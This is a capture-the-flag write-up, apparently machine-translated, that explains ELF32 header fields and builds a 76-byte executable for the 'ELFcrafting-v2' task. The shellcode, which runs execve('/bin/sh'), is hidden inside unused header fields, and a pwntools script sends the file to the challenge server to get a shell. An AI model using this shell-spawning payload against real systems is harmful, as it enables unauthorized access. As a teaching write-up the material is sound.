We write micro-shellcode in ELF format manually

AmateursCTF 2023one of the tasks on pwn was “ELFcrafting-v2”:

The smallest possible 64 bit ELF is 80 bytes. Can you golf it down to 79 bytes?

And attached is a file spinning on a remote server. Opening the file in Ghidra, we see what is required of us:

main function code

main function code

Thus, the only way to solve the problem and get the flag is to write an executable ELF file (because the signature is checked at the beginning of the file). Of course, just in case, the Linux kernel code was checked for other ways to start with such a signature, but unfortunately, the shebang line must begin with #!and other file formats are connected by modules, and in general are also not suitable.

Learning the ELF format

Armed with the standardlink) let’s try to start building at least some executable ELF file.

To begin with, we see that the file must begin with an ELF header, the structure of which is described as follows:

#define EI_NIDENT 16

typedef struct {
    unsigned char e_ident[EI_NIDENT];
    Elf32_Half    e_type;
    Elf32_Half    e_machine;
    Elf32_Word    e_version;
    Elf32_Addr    e_entry;
    Elf32_Off     e_phoff;
    Elf32_Off     e_shoff;
    Elf32_Word    e_flags;
    Elf32_Half    e_ehsize;
    Elf32_Half    e_phentsize;
    Elf32_Half    e_phnum;
    Elf32_Half    e_shentsize;
    Elf32_Half    e_shnum;
    Elf32_Half    e_shstrndx;
} Elf32_Ehdr;

It uses its own data types for fields, they are defined for 32 bit ELF format (in 64-bit other definitions) just above in the document:

Name

Size

alignment

Explanation

Elf32_Addr

4

4

Unsigned program address

Elf32_Half

2

2

Medium size unsigned number

Elf32_Off

4

4

Unsigned file offset

Elf32_Sword

4

4

Signed large number

Elf32_Word

4

4

unsigned large number

unsigned char

1

1

unsigned small number

The header fields themselves have the following meaning:

  • e_ident — ELF file identifier (described in detail below)

  • e_type – type of ELF file, for our purposes, the value 2 “Executable file” is suitable

  • e_machine – the field is intended to determine the required processor architecture for working with the ELF file, but apparently it is not really used much. The document lists some of the first types, but is incomplete (for example, the GCC compiler on my system puts the type 0x3e “Advanced Micro Devices X86-64”), choose 3 “Intel 80386” for the reason below

  • e_version – according to the document, it should be equal to 1

  • e_entry – an important field for us, the address of the entry point to the program in memory (not from the beginning of the file)

  • e_phoff – another important field, the offset from the beginning of the file to the program headers (Program Header), which are used to run the ELF file

  • e_shoff – a field that sets the offset to the section headers (Section Header), which are used to link the file, for our purposes its value plays no role and it will be important in the future

  • e_flags – the field that sets the flags specific to the processor, as it turned out, is also not important

  • e_ehsize – the size of the header of the ELF file, despite the apparent significance, the Linux kernel apparently ignores the value of this field when starting the file

  • e_phentsize – the size of each of the program headers, in my case it is 32 bytes, in accordance with the header according to the specification

  • e_phnum — number of program headers, 1

  • e_shentsize — the size of each of the section headers, 0

  • e_shnum — number of section headers, must be 0

  • e_shstrndx — index in the array of section headers, corresponding to the section with a table of string names, must also have the value 0

At this stage of reading, it is not very clear what the endianness of numbers should be, and the documentation answers this question below, in the section on ELF identification. The ELF file ID is 16 bytes long (as mentioned above) and has the following structure:

  • Signature: \x7fELFor 7f 45 4c 46 in hexadecimal representation

  • File class: 1 for ELF32, 2 for ELF64

  • Encoding: 1 for little-endian, 2 for big-endian

  • Version: Same as header version field, 1

  • Alignment: 9 zeros to pad up to 16 bytes, their value is ignored by the standard

Much lower, in the Intel identification section, it is indicated that little-endian values ​​\u200b\u200bmust be used for identification, and in the field e_machine should be 3.

Now everything is ready to collect the first header of the file:

elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
    *2 .to_bytes(2, 'little'), # e_type
    *3 .to_bytes(2, 'little'), # e_machine
    *1 .to_bytes(4, 'little'), # e_version
    *0 .to_bytes(4, 'little'), # e_entry TODO
    *52 .to_bytes(4, 'little'), # e_phoff
    *0 .to_bytes(4, 'little'), # e_shoff
    *0 .to_bytes(4, 'little'), # e_flags
    *52 .to_bytes(2, 'little'), # e_ehsize
    *32 .to_bytes(2, 'little'), # e_phentsize
    *1 .to_bytes(2, 'little'), # e_phnum
    *0 .to_bytes(2, 'little'), # e_shentsize
    *0 .to_bytes(2, 'little'), # e_shnum
    *0 .to_bytes(2, 'little'), # e_shstrndx
])

There is a missing field here e_entry, because we don’t know how to fill it yet. Therefore, it is time to proceed to the second heading – the heading of the program. Its structure is described as follows:

typedef struct {
    Elf32_Word p_type;
    Elf32_Off  p_offset;
    Elf32_Addr p_vaddr;
    Elf32_Addr p_paddr;
    Elf32_Word p_filesz;
    Elf32_Word p_memsz;
    Elf32_Word p_flags;
    Elf32_Word p_align;
} Elf32_Phdr;

Description of fields:

  • p_type – segment type, in our case it will be 1 “Downloadable”

  • p_offset – offset from the beginning of the file to the contents of the segment

  • p_vaddr — virtual address of the segment

  • p_paddr – the physical address of the segment for OS that do not use virtual addressing

  • p_filesz — segment size in the file

  • p_memsz – the size of the segment in memory, cannot be less p_fileszif more — the tail of the segment is filled with zeros

  • p_flags – segment flags, in our case it will be the value 5, corresponding to setting bit 1 for execution and 4 for reading

  • p_align – the required segment alignment, in practice it turned out that it cannot be completely arbitrary, for the Linux system the value came up 0x1000corresponding to the alignment of virtual memory pages

Now you can write the title of the program:

program_header = bytes([
    *1 .to_bytes(4, 'little'), # p_type
    *0 .to_bytes(4, 'little'), # p_offset TODO
    *0 .to_bytes(4, 'little'), # p_vaddr TODO
    *0 .to_bytes(4, 'little'), # p_paddr TODO
    *0 .to_bytes(4, 'little'), # p_filesz TODO
    *0 .to_bytes(4, 'little'), # p_memsz TODO
    *5 .to_bytes(4, 'little'), # p_flags
    *0x1000 .to_bytes(4, 'little'), # p_align
])

In this header, there are already quite a lot of values ​​​​left for the future, which means that you need to write the code of the program itself. For simplicity, let’s just write a successful output:

mov eax, 1 ; номер системного вызова sys_exit
xor ebx, ebx ; возвращаемый status-code
int 0x80 ; программное прерывание syscall в Linux

To assemble the file I use pwntoolsso the resulting code will look like this:

from pwn import * 


MEMORY_START = 0x1000

code = asm(f'''
mov eax, 1
xor ebx, ebx
int 0x80
''', arch="x86", os="linux")

elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
    *2 .to_bytes(2, 'little'), # e_type
    *3 .to_bytes(2, 'little'), # e_machine
    *1 .to_bytes(4, 'little'), # e_version
    *(MEMORY_START + 84).to_bytes(4, 'little'), # e_entry
    *52 .to_bytes(4, 'little'), # e_phoff
    *0 .to_bytes(4, 'little'), # e_shoff
    *0 .to_bytes(4, 'little'), # e_flags
    *52 .to_bytes(2, 'little'), # e_ehsize
    *32 .to_bytes(2, 'little'), # e_phentsize
    *1 .to_bytes(2, 'little'), # e_phnum
    *0 .to_bytes(2, 'little'), # e_shentsize
    *0 .to_bytes(2, 'little'), # e_shnum
    *0 .to_bytes(2, 'little'), # e_shstrndx
])

program_header = bytes([
    *1 .to_bytes(4, 'little'), # p_type
    *0 .to_bytes(4, 'little'), # p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *(84 + len(code)).to_bytes(4, 'little'), # p_filesz
    *(84 + len(code)).to_bytes(4, 'little'), # p_memsz
    *5 .to_bytes(4, 'little'), # p_flags
    *0x1000 .to_bytes(4, 'little'), # p_align
])

print(len(elf_header), elf_header)
print(len(program_header), program_header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(elf_header)
    f.write(program_header)
    f.write(code)

Behind the scenes was the choice of values p_vaddr And p_paddr. Works on my system 0x1000, but when all the work was done and it was time to send the solution to the server, the program refused to work. It turned out that, for example, in Ubuntu Linux, there is a limitation vm.mmap_min_addr equal 0x10000. In general, it is recommended to use the value 0x8048100which is described in the document in the section “Operating System Specific (UNIX System V Release 4)”.

Also, you cannot load the program from anywhere, for example, you cannot take the bytes after the header, because they are not aligned to 0x1000which is indicated in p_align. Therefore, we load from the beginning of the file, and then we ask to start execution from the start.

Let’s check that everything works:

Running the first version of the file

Running the first version of the file

Of course, not the required 79 bytes, but at least it works. But 93 bytes is also not bad, albeit for a program that does nothing.

Compressing the file

In order to reduce the file size, let’s look at it in hexadecimal code:

File side view

File side view

Our ELF header is marked in red, the program header is in green, the rest is code.

Here, the coincidence of the last 8 bytes of the ELF header and the first 8 bytes of the program header is immediately striking. Moreover, this coincidence has almost no effect on us as programmers, because it contains mostly data that we still could not replace with anything for correct operation.

Now let’s think about what we would like to do in general. It is clear that we already have little space, so read the flag file (which is located in the same directory and has the name flag.txt) and will not display on the screen. Let’s try the classic trick then and run /bin/sh.

This is done with just one system call, but you still need to store a string with the path to run somewhere. Here 9 bytes of alignment at the end of the identifier will help us! You also need to pass arrays argv And envp for arguments and environment variables, but we’ll just ignore that and send null pointers. Fortunately, this is allowed, and what’s more, when the program starts, the system carefully fills all the registers with zeros for us, so we don’t have to do anything at all. So with the optimizations mentioned, the code now looks like this:

from pwn import *


MEMORY_START = 0x08048000
HEADER_LENGTH = 76

code = asm(f'''
mov eax, 11
mov ebx, {MEMORY_START + 8}
int 0x80
''', arch="x86", os="linux")

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
    2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
    *(MEMORY_START + HEADER_LENGTH).to_bytes(4, 'little'), # e_entry
    44, 0, 0, 0, # e_phoff
    *([0] * 10), # e_shoff, e_flags, e_ehsize
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
                                   # p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])

assert len(header) == HEADER_LENGTH

print(len(header), header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(header)
    f.write(code)

Check if it still works:

Checking the work of the second option

Checking the work of the second option

At this stage, it is already becoming clear where the 76 bytes from the preface came from, because we just have to remove the assembly code somewhere.

Packing the code in the header

First, let’s see how we can generally reduce our current code:

mov eax, 11
mov ebx, 0x08048008
int 0x80

It is clear that the last instruction cannot be put anywhere, filling ebx too, although it depends on the value, but it will definitely not work to reduce it to 2 bytes, but initialization eax easily transcribed into mov al, 11:

0:  b0 0b                   mov    al, 0xb
2:  bb 08 80 04 08          mov    ebx, 0x8048008
7:  cd 80                   int    0x80

We get only 9 bytes! We recall from the beginning of the story that the fields e_shoff, e_flags And e_ehsize are not used, and they just occupy 10 bytes in the header. It remains only to put everything together:



MEMORY_START = 0x08048000
HEADER_LENGTH = 76

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
    2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
    *(MEMORY_START + 32).to_bytes(4, 'little'), # e_entry
    44, 0, 0, 0, # e_phoff
    0xb0, 0x0b, # mov al, 11
    0xbb, *(MEMORY_START + 8).to_bytes(4, 'little'), # mov ebx, MEMORY_START + 8
    0xcd, 0x80, # int 0x80
    0,
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
                                   # p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])

assert len(header) == HEADER_LENGTH

print(len(header), header)

with open('./result', 'wb') as f:
    f.write(header)

You can see how we have moved from elf_header, program_header And code first to header And codeand now to simply header =)

First, let’s make sure the kernel can still run the file:

Verification of the third version

Verification of the third version

But there are, of course, and unpleasant moments. For example, gdb now refuses to run our file, although this is bypassed by running through gdbserver, but still unpleasant.

Getting the flag

To get the flag, let’s write another script so as not to bother with redirecting input first from the file, and then from the terminal, or something like that:

from pwn import *


# sh = process(['./chal'])
sh = remote(...)

with open('result', 'rb') as f:
    sh.send(f.read())

sh.interactive()

And finally, we get the flag:

Getting the flag

Getting the flag

Afterword

Of course, many points were missed along the way, both in solving the task and in the details of the ELF format, but this material should be taken primarily as a how-to for solving similar CTF tasks, that is, write-up, rather than a full-fledged textbook on the ELF format.

Thanks for reading! I hope the above seemed interesting, do not be afraid to understand the specifications and even more so perceive the work of individual parts of a computer or operating system as something magical. Everything has sources.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *